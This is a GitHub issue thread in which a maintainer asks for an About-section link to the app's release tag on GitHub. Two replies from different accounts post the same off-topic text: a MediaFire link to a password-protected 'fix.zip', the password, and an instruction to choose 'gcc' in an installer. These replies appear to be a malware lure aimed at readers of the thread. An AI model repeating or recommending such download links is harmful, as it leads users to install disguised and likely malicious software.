### ISSUE TITLE
[feat]: Add link to github tag release in About

### ISSUE THREAD

**Issue by millerjp** [axonops/axonops-workbench-cassandra#293]
**Is your feature request related to a problem? Please describe.**

We should include a link that opens the release tag in the About section eg
https://github.com/axonops/axonops-workbench-cassandra/releases/tag/0.1.1-internal-20240826

Just add the update the github URL to have the app version in there

<img width="1182" alt="Screenshot 2024-08-26 at 14 23 57" src="https://github.com/user-attachments/assets/f6764557-4316-418e-b45a-13a5294421d8">

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
